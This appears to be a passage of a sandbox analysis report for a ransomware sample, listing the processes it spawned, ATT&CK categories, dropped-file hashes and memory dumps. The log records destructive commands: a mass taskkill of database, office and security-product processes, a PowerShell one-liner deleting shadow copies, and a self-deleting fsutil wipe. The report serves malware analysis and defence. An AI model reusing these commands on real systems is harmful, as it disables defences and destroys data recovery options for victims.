C:\Windows\SYSTEM32\taskkill.exePID:4308"taskkill.exe" /IM mysqld.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3220"taskkill.exe" /IM sqbcoreservice.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3860"taskkill.exe" /IM firefoxconfig.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4200"taskkill.exe" /IM agntsvc.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4196"taskkill.exe" /IM thebat.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4348"taskkill.exe" /IM steam.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:652"taskkill.exe" /IM encsvc.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:980"taskkill.exe" /IM excel.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1104"taskkill.exe" /IM CNTAoSMgr.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1608"taskkill.exe" /IM sqlwriter.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1804"taskkill.exe" /IM tbirdconfig.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1092"taskkill.exe" /IM dbeng50.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2268"taskkill.exe" /IM thebat64.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2456"taskkill.exe" /IM ocomm.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2960"taskkill.exe" /IM infopath.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4460"taskkill.exe" /IM mbamtray.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2004"taskkill.exe" /IM zoolz.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4552"taskkill.exe" IM thunderbird.exe /FKills process with taskkill
-
C:\Windows\SYSTEM32\taskkill.exePID:4624"taskkill.exe" /IM dbsnmp.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3644"taskkill.exe" /IM xfssvccon.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4752"taskkill.exe" /IM mspub.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4736"taskkill.exe" /IM Ntrtscan.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:200"taskkill.exe" /IM isqlplussvc.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3816"taskkill.exe" /IM onenote.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4680"taskkill.exe" /IM PccNTMon.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1392"taskkill.exe" /IM msaccess.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2788"taskkill.exe" /IM outlook.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2040"taskkill.exe" /IM tmlisten.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3948"taskkill.exe" /IM msftesql.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:5112"taskkill.exe" /IM powerpnt.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3712"taskkill.exe" /IM mydesktopqos.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4152"taskkill.exe" /IM visio.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3624"taskkill.exe" /IM mydesktopservice.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3192"taskkill.exe" /IM winword.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4204"taskkill.exe" /IM mysqld-nt.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:3800"taskkill.exe" /IM wordpad.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:616"taskkill.exe" /IM mysqld-opt.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4456"taskkill.exe" /IM ocautoupds.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:1676"taskkill.exe" /IM ocssd.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4292"taskkill.exe" /IM oracle.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4468"taskkill.exe" /IM sqlagent.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:2784"taskkill.exe" /IM sqlbrowser.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:5040"taskkill.exe" /IM sqlservr.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exePID:4220"taskkill.exe" /IM synctime.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3544"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\notepad.exePID:4528"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txtOpens file in notepad (likely ransom note)Suspicious use of FindShellTrayWindow
-
C:\Windows\SYSTEM32\cmd.exePID:616"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
-
C:\Windows\system32\PING.EXEPID:3336ping 127.0.0.7 -n 3Runs ping.exe
-
C:\Windows\system32\fsutil.exePID:5816fsutil file setZeroData offset=0 length=524288 “%s”
-
C:\Windows\System32\cmd.exePID:4204"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
-
C:\Windows\system32\choice.exePID:4748choice /C Y /N /D Y /T 3
Network
MITRE ATT&CK Matrix
Collection
Data from Local System
1Command and Control
Credential Access
Credentials in Files
1Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
00:00
00:00
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2a84a6a6c326f285e6e21096b12bd969
SHA19be8d1dc219dc1cfda315acf8680af06173cf696
SHA256f67d9a6332817ae22e0000b3a6ac0b4b5369802bfb935a3e8cdb75668bcd9776
SHA512a2503237b630c1df259791c7060942c14698274772ffd3d89ba92e96fca3daa25e27fae8fcb53766cfd6e5fb2adbc83a9cf62ceb722bb505e603c54eb3f66931
-
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txtMD5
1be2f1bf18c999a73d0e09f1f05caf69
SHA1b6ce5de5c5f12d43ab2378fc291b097a82b65d9f
SHA256b3afeebc76faaeeb1fd7694c1cd40e41e71bae5173049d26f6439b3721080621
SHA512ff38872c3d32fb9590d13678e771d6babeb37a670957d658c4450252b7767f89db291c7d1d4f271367d3e70367b5010a1346f02b89d83f86cf60b4245a45cd87
-
memory/200-33-0x0000000000000000-mapping.dmp
-
memory/420-8-0x0000000000000000-mapping.dmp
-
memory/616-62-0x0000000000000000-mapping.dmp
-
memory/616-47-0x0000000000000000-mapping.dmp
-
memory/652-17-0x0000000000000000-mapping.dmp
-
memory/724-10-0x0000000000000000-mapping.dmp
-
memory/972-5-0x0000000000000000-mapping.dmp
-
memory/980-18-0x0000000000000000-mapping.dmp
-
memory/988-6-0x0000000000000000-mapping.dmp
-
memory/1092-22-0x0000000000000000-mapping.dmp
-
memory/1104-19-0x0000000000000000-mapping.dmp
-
memory/1392-36-0x0000000000000000-mapping.dmp
-
memory/1608-20-0x0000000000000000-mapping.dmp
-
memory/1676-49-0x0000000000000000-mapping.dmp
-
memory/1804-21-0x0000000000000000-mapping.dmp
-
memory/2004-27-0x0000000000000000-mapping.dmp
-
memory/2040-38-0x0000000000000000-mapping.dmp
-
memory/2268-23-0x0000000000000000-mapping.dmp
-
memory/2456-24-0x0000000000000000-mapping.dmp
-
memory/2784-52-0x0000000000000000-mapping.dmp
-
memory/2788-37-0x0000000000000000-mapping.dmp
-
memory/2792-9-0x0000000000000000-mapping.dmp
-
memory/2960-25-0x0000000000000000-mapping.dmp
-
memory/3008-4-0x0000000000000000-mapping.dmp
-
memory/3192-44-0x0000000000000000-mapping.dmp
-
memory/3220-12-0x0000000000000000-mapping.dmp
-
memory/3336-65-0x0000000000000000-mapping.dmp
-
memory/3544-56-0x00007FF9427B0000-0x00007FF94319C000-memory.dmpFilesize
9MB
-
memory/3544-55-0x0000000000000000-mapping.dmp
-
memory/3544-57-0x000002B679AD0000-0x000002B679AD1000-memory.dmpFilesize
4KB
-
memory/3544-58-0x000002B679C80000-0x000002B679C81000-memory.dmpFilesize
4KB
-
memory/3544-7-0x0000000000000000-mapping.dmp
-
memory/3624-43-0x0000000000000000-mapping.dmp
-
memory/3644-30-0x0000000000000000-mapping.dmp
-
memory/3712-41-0x0000000000000000-mapping.dmp
-
memory/3800-46-0x0000000000000000-mapping.dmp
-
memory/3816-34-0x0000000000000000-mapping.dmp
-
memory/3860-13-0x0000000000000000-mapping.dmp
-
memory/3948-39-0x0000000000000000-mapping.dmp
-
memory/4152-42-0x0000000000000000-mapping.dmp
-
memory/4196-15-0x0000000000000000-mapping.dmp
-
memory/4200-14-0x0000000000000000-mapping.dmp
-
memory/4204-45-0x0000000000000000-mapping.dmp
-
memory/4204-63-0x0000000000000000-mapping.dmp
-
memory/4220-54-0x0000000000000000-mapping.dmp
-
memory/4292-50-0x0000000000000000-mapping.dmp
-
memory/4308-11-0x0000000000000000-mapping.dmp
-
memory/4348-16-0x0000000000000000-mapping.dmp
-
memory/4456-48-0x0000000000000000-mapping.dmp
-
memory/4460-26-0x0000000000000000-mapping.dmp
-
memory/4468-51-0x0000000000000000-mapping.dmp
-
memory/4528-61-0x0000000000000000-mapping.dmp
-
memory/4552-28-0x0000000000000000-mapping.dmp
-
memory/4624-29-0x0000000000000000-mapping.dmp
-
memory/4680-35-0x0000000000000000-mapping.dmp
-
memory/4736-32-0x0000000000000000-mapping.dmp
-
memory/4748-66-0x0000000000000000-mapping.dmp
-
memory/4752-31-0x0000000000000000-mapping.dmp
-
memory/4764-0-0x00007FF9427B0000-0x00007FF94319C000-memory.dmpFilesize
9MB
-
memory/4764-1-0x00000000003E0000-0x00000000003E1000-memory.dmpFilesize
4KB
-
memory/5040-53-0x0000000000000000-mapping.dmp
-
memory/5104-3-0x0000000000000000-mapping.dmp
-
memory/5112-40-0x0000000000000000-mapping.dmp
-
memory/5816-67-0x0000000000000000-mapping.dmp
Loading data